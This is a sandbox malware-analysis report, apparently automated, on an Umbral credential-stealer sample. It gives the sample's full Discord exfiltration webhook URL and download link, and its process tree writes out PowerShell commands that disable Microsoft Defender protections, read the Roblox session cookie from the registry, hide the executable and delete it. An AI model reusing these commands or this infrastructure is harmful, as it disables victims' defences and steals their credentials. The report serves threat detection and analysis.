umbral | hxxps://gofile[.]io/d/TyUKOM

Analysis

max time kernel
900s
max time network
844s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
06-02-2025 19:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/TyUKOM

Score

10^/10

umbral defense_evasion discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1337138017562792159/xmElyT0IfsdggxieynqYkNPVcaz_j7RbU0imvBjX13Hsu3xOZ0MougADMFLAa5w5NF3S

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001e00000002aae0-77.dat	family_umbral
behavioral1/memory/3380-80-0x00000293E3F20000-0x00000293E3F60000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4440	powershell.exe
2424	powershell.exe
1084	powershell.exe
2672	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
15	3376	chrome.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Executes dropped EXE 1 IoCs

pid	Process
3380	Umbral.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
19	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Umbral.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1052	cmd.exe
792	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4492	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133833428041604041"	chrome.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Umbral.exe:Zone.Identifier	chrome.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\jeMlb.scr\:Zone.Identifier:$DATA	Umbral.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
792	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3664	chrome.exe
3664	chrome.exe
3380	Umbral.exe
2672	powershell.exe
2672	powershell.exe
2672	powershell.exe
4440	powershell.exe
4440	powershell.exe
4440	powershell.exe
2424	powershell.exe
2424	powershell.exe
2424	powershell.exe
2060	powershell.exe
2060	powershell.exe
2060	powershell.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
3684	chrome.exe
3684	chrome.exe
3684	chrome.exe
3684	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeShutdownPrivilege	3664	chrome.exe
Token: SeCreatePagefilePrivilege	3664	chrome.exe
Token: SeDebugPrivilege	3380	Umbral.exe
Token: SeIncreaseQuotaPrivilege	2784	wmic.exe
Token: SeSecurityPrivilege	2784	wmic.exe
Token: SeTakeOwnershipPrivilege	2784	wmic.exe
Token: SeLoadDriverPrivilege	2784	wmic.exe
Token: SeSystemProfilePrivilege	2784	wmic.exe
Token: SeSystemtimePrivilege	2784	wmic.exe
Token: SeProfSingleProcessPrivilege	2784	wmic.exe
Token: SeIncBasePriorityPrivilege	2784	wmic.exe
Token: SeCreatePagefilePrivilege	2784	wmic.exe
Token: SeBackupPrivilege	2784	wmic.exe
Token: SeRestorePrivilege	2784	wmic.exe
Token: SeShutdownPrivilege	2784	wmic.exe
Token: SeDebugPrivilege	2784	wmic.exe
Token: SeSystemEnvironmentPrivilege	2784	wmic.exe
Token: SeRemoteShutdownPrivilege	2784	wmic.exe
Token: SeUndockPrivilege	2784	wmic.exe
Token: SeManageVolumePrivilege	2784	wmic.exe
Token: 33	2784	wmic.exe
Token: 34	2784	wmic.exe
Token: 35	2784	wmic.exe
Token: 36	2784	wmic.exe
Token: SeIncreaseQuotaPrivilege	2784	wmic.exe
Token: SeSecurityPrivilege	2784	wmic.exe
Token: SeTakeOwnershipPrivilege	2784	wmic.exe
Token: SeLoadDriverPrivilege	2784	wmic.exe
Token: SeSystemProfilePrivilege	2784	wmic.exe
Token: SeSystemtimePrivilege	2784	wmic.exe
Token: SeProfSingleProcessPrivilege	2784	wmic.exe
Token: SeIncBasePriorityPrivilege	2784	wmic.exe
Token: SeCreatePagefilePrivilege	2784	wmic.exe
Token: SeBackupPrivilege	2784	wmic.exe
Token: SeRestorePrivilege	2784	wmic.exe
Token: SeShutdownPrivilege	2784	wmic.exe
Token: SeDebugPrivilege	2784	wmic.exe
Token: SeSystemEnvironmentPrivilege	2784	wmic.exe
Token: SeRemoteShutdownPrivilege	2784	wmic.exe
Token: SeUndockPrivilege	2784	wmic.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe
3664	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3664 wrote to memory of 2644	3664	chrome.exe	78
PID 3664 wrote to memory of 2644	3664	chrome.exe	78
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 400	3664	chrome.exe	79
PID 3664 wrote to memory of 3376	3664	chrome.exe	80
PID 3664 wrote to memory of 3376	3664	chrome.exe	80
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81
PID 3664 wrote to memory of 3860	3664	chrome.exe	81

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3288	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/TyUKOM
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc6743cc40,0x7ffc6743cc4c,0x7ffc6743cc58
  2⤵
  PID:2644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1764,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1760 /prefetch:2
  2⤵
  PID:400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2024,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  PID:3376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1616,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:8
  2⤵
  PID:3860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3100 /prefetch:1
  2⤵
  PID:3824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:4060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4288,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:1748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3668,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:8
  2⤵
  PID:2860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3468,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4332 /prefetch:1
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5068,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:8
  2⤵
  PID:3976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4440,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:1592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5088,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4452 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:3836
- C:\Users\Admin\Downloads\Umbral.exe
  "C:\Users\Admin\Downloads\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3380
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:3288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2060
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2088
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2232
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1084
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4492
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Umbral.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1052
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4872,i,16187591587164215536,18139941455044064447,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=212 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3684

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
d74914d673d91021a1f865c1d98e982b

SHA1
0b74af8fbcdcb6581f1201a3ad0286547f67f6e0

SHA256
032deb7bf86ffc69339f5a0c36769d4ab365c24861a666734e8cccafd4246053

SHA512
1f7487305deb42fa6d77a329461b8b34c2df7d4664567bcf3ff509dac9c237e000299f83323d0d5e7dfa72e810c11c52b7177be78e38291915928fcb13c64cda

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
10d619d5fccc1dc1312b4ac906d2ff1f

SHA1
005dcb89bafba4ee3cb19201af7405c917c50f56

SHA256
ca4d31df9d501c3abe638cc189c8e122b598a14860f74f9b8e813f398bcb3d42

SHA512
1ef2ad44aa5c861a72be0bf00dc116e10bac34bba74e5823de12c1ab715ffa5389d7302e073fb30d1943445446ef7d2a115fde1974a2da1c423b8c5af4239856

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Filesize
1KB

MD5
94b10a9dc9fe3a4c9b8553213ce15e52

SHA1
40c3b5e223dfb299fea0316027be0d5795b588e8

SHA256
c6648835c8c9371cda6c989570b62f5d4df5517a63442b35b98c00ac392b7fab

SHA512
136f3630db3f99520df90baa8618a4e5584e965afb201d9e7df1e22bd9164b15021fc15bb5c8a2e13089f979f9c422a50f2107fbc88c2a4dd68b1643f962544d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
3c05674ba5a5c118749763ad550e7211

SHA1
f063dd81d78f8010a9b070eca1839eda13128ee7

SHA256
1e42c3cecbd4c7503c39d4af1fc00c7bc7e49295fcfaa713efad51de67485a41

SHA512
1a6a036fa2736bdac9b17a778c0389765521e20c57e174dc6e0837b7acff43a173d9c873187f406034ef74d63859cf8c1a44c88ddb8ea83a8ba75ca76d17dfaa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
6fdc94ea46c9e0dababb746c1f691ffa

SHA1
7fd82918400737902faf9bef4aeb12499f1d724a

SHA256
3a0078b2cd88b5ecc2f3a16e24994f08e3755a9206784203a2e5568a094f6b57

SHA512
2536141196b0ea3e67931f02ed7acb655d4d61ca14a3ec709d3115e1f75b9354ae78749b1f833f9fd85b071e1f1658b21762b3ad4bacdeda15ef7c314a8eeafb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d8b293caf27bed4ef7e4e12968cd64a4

SHA1
4c1050dd4cd6236a592301934dc79a0c5d47dc0f

SHA256
cbfbe29fd5bda2dc56c84f97fc11600c579ab758bb1e732bea8751e3ba1f090b

SHA512
3b20d2b135cff4be002ce6bb2483ff1b5ed815e2590c3999dce2447c4ccd6ab34c23bcb0a0f46b34d7fa38e256236756912402dd41962fb77e8192f09ef0136e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7262059718be8b75995fd34f2da81935

SHA1
c0ce07d737db1494bb624b87a0118410945cffb3

SHA256
9e30dcb02316f8aacda7eb4498e00253fc153d99086bbeef2fc620e378f32fee

SHA512
